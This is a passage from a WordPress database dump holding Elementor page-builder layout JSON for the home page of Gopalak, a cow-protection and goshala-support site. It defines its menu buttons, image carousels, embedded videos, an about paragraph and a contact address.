us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10487,1748,'_elementor_page_assets','a:0:{}'),(10510,1752,'_elementor_edit_mode','builder'),(10511,1752,'_elementor_template_type','wp-page'),(10512,1752,'_elementor_version','3.7.8'),(10513,1752,'_wp_page_template','elementor_canvas'),(10514,1752,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_